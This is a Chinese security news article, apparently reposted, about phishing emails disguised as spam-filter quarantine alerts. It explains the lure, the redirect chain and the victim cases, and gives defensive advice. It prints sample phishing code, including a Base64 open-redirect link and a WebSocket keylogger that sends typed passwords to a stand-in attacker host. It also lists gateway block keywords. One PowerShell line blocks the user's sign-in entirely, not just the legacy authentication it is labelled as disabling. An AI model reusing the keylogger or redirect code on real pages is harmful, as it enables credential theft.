“你的邮件被隔离了!”——新型钓鱼邮件正伪装成垃圾过滤器警报,精准收割企业账号

2025年11月,全球知名安全厂商Malwarebytes发布紧急预警:一种高度逼真的钓鱼攻击正在全球蔓延。攻击者不再使用老套的“账户异常”或“包裹未送达”话术,而是精心伪造企业级垃圾邮件过滤器的通知邮件,以“有重要邮件被拦截”为由,诱导用户点击“释放邮件”按钮,最终跳转至高仿登录页面窃取凭证。

这种攻击之所以危险,在于它精准击中了现代办公场景中的一个“信任盲区”——员工每天都会收到来自内部安全系统的各类通知,包括防病毒扫描、邮件隔离、合规提醒等。当一封看似来自公司IT部门的“Spam Filter Alert”出现在收件箱时,很少有人会怀疑其真实性。

更令人担忧的是,此类钓鱼邮件已成功绕过多家企业的邮件网关和终端防护系统。部分案例显示,攻击者甚至能动态填充受害者所在企业的域名,让登录页看起来“量身定制”。一旦账号失守,攻击者可立即发起线程劫持(Thread Hijacking)、发票欺诈,甚至利用被盗邮箱向全公司发送新一轮钓鱼邮件,形成内部扩散链。

尽管目前公开披露的受害案例集中于欧美,但多位国内安全专家警告:随着中国企业云办公普及率持续攀升,类似手法极有可能已在境内悄然试水。一场围绕“邮件可信度”的攻防战,正悄然升级。

一、从“可疑链接”到“系统通知”:钓鱼话术的“合法化”转型

过去十年,网络钓鱼的演进轨迹清晰可见:从早期的拼写错误、夸张措辞(如“您的账户将在24小时内关闭!”),到中期的高仿品牌页面、SSL证书全覆盖,再到如今的情境嵌入式欺骗(Contextual Impersonation)。

“伪装成垃圾邮件过滤器警报”正是这一趋势的最新体现。

Malwarebytes研究人员在分析样本时发现,典型邮件内容如下:

主题:Email Delivery Reports: Incoming Pending Messages

发件人:noreply@securemailgateway[.]com(看似合法)

正文:

“我们最近升级了安全邮件系统,发现有若干待处理邮件未能送达您的收件箱。

消息标题:

采购合同更新(2025-Q4)

财务部:紧急付款请求

IT支持:多因素认证重置

操作:[Move To Inbox](按钮)

注:若此邮件落入垃圾箱,请移至收件箱。消息将在1-2小时内自动删除。”

乍看之下,这与企业常用的Proofpoint、Mimecast或Microsoft Defender for Office 365的隔离通知几乎无异。邮件中列出的消息标题也经过精心设计——均为高频业务关键词,极易触发收件人的紧迫感。

“攻击者不再试图‘吓唬’你,而是‘帮助’你。”公共互联网反网络钓鱼工作组技术专家芦笛指出,“他们知道,现代员工最怕错过重要邮件,尤其是涉及财务或IT权限的内容。”

这种心理操控,使得点击率远高于传统钓鱼邮件。Malwarebytes内部测试显示,在未接受专项培训的员工群体中,此类邮件的点击率高达38%。

二、技术拆解:多跳重定向、动态模板与WebSocket实时窃密

要理解该攻击为何能绕过主流防御体系,必须深入其技术实现细节。

1. 短链+可信托管:绕过URL信誉检测

Malwarebytes发现,钓鱼邮件中的“Move To Inbox”按钮并非直接指向恶意域名,而是先跳转至合法第三方服务,如cbssports[.]com的开放重定向接口,再经由多个中间节点,最终抵达真实钓鱼站点(如mdbgo[.]io)。

<!-- 钓鱼邮件中的按钮代码 -->

<a href="https://www.cbssports.com/redirect?url=aHR0cHM6Ly9tZGJnby5pby9sb2dpbg==">

Move To Inbox

</a>

其中,url参数为Base64编码的真实地址(aHR0cHM6Ly9tZGJnby5pby9sb2dpbg== 解码后为 https://mdbgo.io/login)。由于cbssports.com是高信誉网站,多数邮件网关不会将其标记为恶意。

更狡猾的是,最终钓鱼站点常部署在免费托管平台(如Vercel、Surge.sh、Cloudflare Workers)或新注册域名上,生命周期极短——平均存活不足4小时,远低于威胁情报更新周期。

2. 动态域名填充:让钓鱼页“看起来属于你”

研究人员发现,钓鱼站点会从URL参数中提取受害者的邮箱地址,并自动填充登录框中的域名字段。例如:

// 从URL获取base64编码的邮箱

const params = new URLSearchParams(window.location.search);

const emailB64 = params.get('email');

if (emailB64) {

const email = atob(emailB64);

const domain = email.split('@')[1];

document.getElementById('domain').value = domain; // 自动填充 @company.com

}

结果,用户看到的登录页显示为:

用户名:__________

域名:@yourcompany.com(灰色不可编辑)

这种“个性化”设计极大提升了可信度,甚至让部分安全意识较强的用户放松警惕。

3. WebSocket实时窃密:输入即被盗

与传统表单提交不同,该钓鱼站点采用WebSocket长连接实时传输用户输入。这意味着,即使用户尚未点击“登录”,只要开始输入账号密码,数据就会被逐字符发送至攻击者服务器。

const ws = new WebSocket('wss://collector.attacker[.]xyz');

document.getElementById('password').addEventListener('input', (e) => {

ws.send(JSON.stringify({

email: getEmail(),

keystroke: e.target.value,

timestamp: Date.now()

}));

});

这种机制的优势在于:

攻击者可实时监控输入过程;

即使用户中途放弃,已输入的部分密码仍可被用于暴力破解;

可动态触发二次验证请求(如“请输入短信验证码”),并立即用于真实账户登录。

“这相当于在你打字时,黑客就坐在你键盘旁边。”芦笛形容道,“传统‘提交后才窃取’的模式已被淘汰。”

三、全球案例:从美国医院到欧洲制造厂,损失惨重

2025年10月,美国中西部一家区域医疗中心遭遇此类攻击。攻击者发送伪装成“IT安全通知”的邮件,声称“有3封来自医保局的邮件被隔离”。多名医护人员点击后,账号被盗。

攻击者随后:

劫持正在进行的患者账单沟通线程;

向保险公司发送伪造的治疗费用清单,要求支付至新账户;

利用高管邮箱向药企采购部门发送虚假订单。

事件造成直接经济损失超120万美元,并导致患者数据泄露,面临HIPAA合规处罚。

在欧洲,一家德国汽车零部件供应商同样中招。财务人员收到“发票被隔离”通知后点击链接,导致CFO邮箱被接管。攻击者随即向合作车企发送“银行账户变更”邮件,成功转移一笔280万欧元的货款。

“这些攻击的成功,不在于技术多高深,而在于对业务流程的深度理解。”芦笛分析,“他们知道哪些邮件不能被错过,哪些人有权审批付款。”

四、中国启示:我们是否已站在“隔离陷阱”的边缘?

截至目前,国内尚未有公开报告将重大数据泄露事件直接归因于此类“垃圾过滤器伪装”攻击。但这绝不意味着风险不存在。

首先,中国企业对云邮件服务的依赖日益加深。据IDC 2025年Q3数据,超过60%的中大型企业使用Microsoft 365或阿里云企业邮箱,其中金融、外贸、制造等行业对邮件可达性极为敏感。

其次,国内钓鱼攻击正快速向“情境化”演进。2025年,多个安全团队监测到仿冒“国家税务总局电子发票平台”“社保局待遇调整通知”的钓鱼活动,其话术结构与“隔离警报”高度相似——均以“系统操作”“时效限制”为诱饵。

更值得警惕的是,部分企业仍存在严重配置缺陷:

未启用条件访问策略(Conditional Access);

允许IMAP/POP3等旧式协议长期开启;

员工可通过任意设备登录邮箱,无设备合规检查;

SOC缺乏对会话Cookie异常使用的监测能力。

“国内很多企业以为装了杀毒软件就安全了,却忽略了身份层才是最大突破口。”芦笛强调。

五、防御路线图:从技术加固到行为规范的全链条响应

面对如此精准的社会工程攻击,单一防护手段已远远不够。专家建议采取以下多层次防御策略:

1. 强制FIDO2/Passkeys等无钓鱼认证

短信验证码和OTP应用(如Google Authenticator)易受中间人攻击。企业应优先部署FIDO2安全密钥(如YubiKey)或Windows Hello,实现真正的无密码、无钓鱼认证。

# 通过Azure AD PowerShell禁用旧式认证

Set-MsolUser -UserPrincipalName user@company.com -BlockCredential $true

Set-CASMailbox -Identity user@company.com -ImapEnabled $false -PopEnabled $false

2. 邮件网关策略升级:关键词+链接深度解析

安全团队应在邮件网关中对以下关键词提高拦截阈值:

“隔离”、“pending messages”、“quarantined”、“release email”、“spam filter alert”

同时,部署点击时沙箱(Click-time Sandboxing)技术:当用户点击链接时,由代理服务器代为访问,执行完整跳转链,并渲染最终页面进行恶意判定。

# 伪代码:点击时沙箱逻辑

def analyze_url_on_click(short_url):

final_url = resolve_redirect_chain(short_url)

if is_hosted_on_free_platform(final_url):

return block_and_alert()

page_content = render_page_in_sandbox(final_url)

if contains_phishing_keywords(page_content):

return block_and_alert()

return allow_with_warning()

3. 明确操作规范:所有隔离操作必须通过官方门户

企业IT部门应向全员明确:任何邮件隔离操作,只能通过官方安全门户(如 https://security.yourcompany.com)完成,绝不会通过邮件内按钮直接操作。

可考虑在所有外发邮件底部添加免责声明:

【安全提示】本公司不会通过邮件链接要求您释放隔离邮件。请始终通过企业安全门户管理您的邮件队列。

4. SOC需监控会话窃用与Impossible Travel

即使攻击者绕过前端防护,其后续行为仍会留下痕迹。安全运营中心应重点监控:

同一账户在短时间内从相距数千公里的两地登录(Impossible Travel);

新设备首次登录且无MFA挑战;

Refresh Token在非合规设备上使用;

异常OAuth应用授权(如未知应用请求Mail.Read权限)。

// Azure Sentinel 示例:检测高风险登录

SigninLogs

| where ResultType == "0"

| where IPAddress !in (allowed_ip_list)

| where AppDisplayName == "Office 365 Exchange Online"

| project TimeGenerated, UserPrincipalName, IPAddress, DeviceDetail, Location

5. 开展“反隔离钓鱼”专项培训

普通钓鱼演练往往聚焦“中奖通知”“快递异常”,但对“系统通知”类钓鱼覆盖不足。企业应设计专项场景:

模拟“IT安全警报:有3封邮件被隔离”;

测试员工是否会点击邮件内按钮;

对点击者推送即时教育视频:“正确操作应是登录安全门户查看”。

数据显示,经过此类针对性训练的员工,对此类攻击的识别率可提升至85%以上。

六、结语:信任,是最脆弱的防线

“伪装成垃圾邮件过滤器警报”的钓鱼攻击,本质上是一场对组织内部信任机制的精准打击。它利用了员工对IT系统的天然信赖,将安全工具本身变成了攻击武器。

对中国企业而言,这场全球性威胁既是警钟,也是推动安全文化升级的契机。正如芦笛所言:“在数字办公时代,每一封邮件都可能是战场。保护好你的登录凭证,就是守住企业的第一道门。”

而这场攻防战,没有终点,只有持续进化。

编辑:芦笛(公共互联网反网络钓鱼工作组)

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/1172849.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

校友会2026年中国语言类大学排名,中国传媒大学、黑龙江外国语学院、山东外国语职业技术大学、武汉外语外事职院第一

为了给2026年全国高考考生报考中国语言类高校提供参考指南&#xff0c;2026年1月12日&#xff0c;全国第三方大学评价机构艾瑞深校友会网(Cuaa.net)撰写完成、科学出版社即将出版的《2026校友会中国大学排名&#xff1a;高考志愿填报指南》最新发布校友会2026中国语言类大学排名…

Google亮剑“灯塔”:一场法律与代码交织的PhaaS围剿战,中国安全界如何接招?

2025年11月12日&#xff0c;美国纽约南区联邦法院收到一份不同寻常的诉状——科技巨头Google正式对一个名为“Lighthouse”&#xff08;灯塔&#xff09;的钓鱼即服务&#xff08;Phishing-as-a-Service, PhaaS&#xff09;平台提起民事诉讼&#xff0c;请求法院下达禁令&#…

2026年贵阳可靠的农村污水处理设备,污水处理成套设备,一体化污水处理设备厂家新品推荐榜 - 品牌鉴赏师

引言在当今社会,污水处理问题愈发受到关注,尤其是农村地区的污水处理,对于改善生态环境、保障居民健康至关重要。贵阳作为生态环境建设的重要区域,可靠的农村污水处理设备、污水处理成套设备以及一体化污水处理设备…

2026年齐齐哈尔衣柜橱柜定制推荐供应商,润昕木业零套路不欺瞒 - 工业品牌热点

在齐齐哈尔家居定制市场,衣柜橱柜作为家庭收纳与空间美学的核心载体,其定制品质直接关乎生活舒适度与家居风格统一性。面对市场上鱼龙混杂的供应商,如何找到兼具环保性、实用性与性价比的合作伙伴?以下结合本地需求…

钓鱼邮件“精准制导”升级:Outlook与Gmail成重灾区,企业身份防线告急

2025年12月&#xff0c;全球多家安全机构同步拉响警报&#xff1a;针对Microsoft Outlook和Google Gmail的企业级钓鱼攻击正以空前频率和精度席卷全球。据Security Current World&#xff08;SC World&#xff09;综合多份威胁简报披露&#xff0c;仅在第四季度&#xff0c;仿冒…

计算机等级考试——二叉树考点和坑——东方仙盟

一个高度为 h 的满二叉树的节点总数为 2ʰ−1&#xff0c;从根节点开始&#xff0c;自上而下、同层次节点从左至右&#xff0c;对节点按照顺序依次编号&#xff0c;即根节点编号为 1&#xff0c;其左、右孩子节点编号分别为 2 和 3&#xff0c;再下一层从左到右的编号为 4、5、…

先知AI如何破解男装行业的数据迷局?

在数字化浪潮席卷之下&#xff0c;男装行业正面临前所未有的挑战与机遇。库存积压、设计同质化、消费者需求难以精准捕捉&#xff0c;成为许多企业增长的绊脚石。北京先智先行科技有限公司敏锐洞察到这一痛点&#xff0c;凭借其深厚的行业积累与人工智能技术&#xff0c;推出了…

2026年知名的免费版库存管理软件,库存管理软件,进销存库存管理软件系统厂家选购决策指南 - 品牌鉴赏师

引言在当今数字化经济飞速发展的时代,库存管理软件对于企业的高效运营起着至关重要的作用。尤其是在2026年,随着电商行业的蓬勃发展以及多平台销售模式的普及,免费版库存管理软件、多平台电商库存管理软件、进销存库…

AI视频生成1.7.5 |无限AI视频生成,需要特殊网络

AI Video Generator是一款强大的视频生成工具&#xff0c;支持无限量的视频生成。此版本已完全解锁付费功能&#xff0c;去除了所有广告&#xff0c;并支持多种语言。它适用于Arm64-v8a CPU架构&#xff0c;能够为用户提供流畅且高效的创作体验。无论是创意制作还是个人娱乐&am…

当“我已付款两次”成为钓鱼暗号:Booking.com生态遭系统性渗透,全球酒店与旅客陷信任危机

2025年11月&#xff0c;网络安全公司Sekoia发布一份警报&#xff0c;揭示一场代号为“I Paid Twice”&#xff08;我已付款两次&#xff09;的全球性网络钓鱼行动正悄然侵蚀在线旅游平台的信任根基。这场攻击并非针对单一漏洞或用户疏忽&#xff0c;而是精准利用了Booking.com生…

家用卫浴怎么选?厂家口碑领先推荐,评价高的卫浴口碑推荐榜优质企业盘点及核心优势详细解读 - 品牌推荐师

随着消费升级与健康家居理念的深入,家用卫浴市场正经历一场从“满足基本功能”到“追求品质、健康与美学体验”的深刻变革。消费者在选购时,不再仅仅关注单一产品的价格与外观,而是将目光投向了整个水路系统的安全性…

吐血推荐9个AI论文工具,自考学生轻松搞定毕业论文!

吐血推荐9个AI论文工具&#xff0c;自考学生轻松搞定毕业论文&#xff01; 自考论文写作的“秘密武器”&#xff1a;AI 工具如何改变你的学习节奏 在自考学习的过程中&#xff0c;毕业论文往往是最让人头疼的一环。面对繁杂的选题、复杂的结构和严格的格式要求&#xff0c;许多…

钓鱼团伙用Telegram机器人“接单”:欧洲凭证窃取进入“实时客服”时代

一、当钓鱼攻击有了“客服系统”&#xff1a;点击链接后&#xff0c;有人在Telegram上等你2025年深秋&#xff0c;一位荷兰阿姆斯特丹的中小企业主收到一封看似来自本地银行ING的邮件&#xff1a;“您的账户因异常登录被临时冻结&#xff0c;请立即验证身份。”他点开链接&…

2025年度花灯供应商评选:十大品牌力荐,景区灯会/水上花灯/传统花灯/夜景布置灯/庙会花灯/西游记花灯/古镇花灯工厂怎么选购 - 品牌推荐师

随着文旅融合的深入与夜游经济的蓬勃发展,花灯作为承载传统文化与创新科技的重要载体,其市场需求持续增长,对供应商的综合能力也提出了更高要求。面对市场上众多的花灯供应商,如何选择一家兼具文化底蕴、创意设计、…

MySQL 核心机制精讲:B+树查询、Buffer Pool、COUNT 优化与 CHAR/VARCHAR 实战指南

一、请详细描述一下MySQLB树查询数据的过程B树查询数据分两个阶段&#xff1a; 1. 先从根节点往下定位到叶子节点。 2. 在叶子节点内部定位到具体的数据行。第一阶段是树的垂直查找&#xff0c;从根节点开始&#xff0c;要查询的键值和节点内存储的索引的键值作比较&#xff0c…

救命神器2026继续教育TOP10AI论文写作软件测评与推荐

救命神器2026继续教育TOP10AI论文写作软件测评与推荐 2026年继续教育领域AI论文写作工具测评维度解析 随着人工智能技术的不断进步&#xff0c;AI写作工具在学术研究与继续教育领域的应用日益广泛。然而&#xff0c;面对市场上琳琅满目的产品&#xff0c;如何选择真正适合自身需…

校友会2026年中国农林类大学排名,中国农业大学、华南农业大学珠江学院、新疆农业职业技术大学、江苏农林职业技术学院第一

为了给2026年全国高考考生报考中国农林类高校提供参考指南&#xff0c;2026年1月12日&#xff0c;全国第三方大学评价机构艾瑞深校友会网(Cuaa.net)撰写完成、科学出版社即将出版的《2026校友会中国大学排名&#xff1a;高考志愿填报指南》最新发布校友会2026中国农林类大学排名…

2025中国力学大会AI+分享 | 四川大学张来平研究员:基于图神经网络的流场预测方法研究进展

作者简介&#xff1a;张来平&#xff0c;博士&#xff0c;原军科院创新研究院研究员。长期从事计算流体力学研究&#xff0c;主要研究领域包括&#xff1a;复杂外形网格生成技术、非结构网格高精度计算方法、高性能计算、大型CAE工业软件研发及在航空航天中的应用等。近年来专注…

GESP认证C++编程真题解析 | P11964 [GESP202503 七级] 图上移动

​欢迎大家订阅我的专栏&#xff1a;算法题解&#xff1a;C与Python实现&#xff01; 本专栏旨在帮助大家从基础到进阶 &#xff0c;逐步提升编程能力&#xff0c;助力信息学竞赛备战&#xff01; 专栏特色 1.经典算法练习&#xff1a;根据信息学竞赛大纲&#xff0c;精心挑选…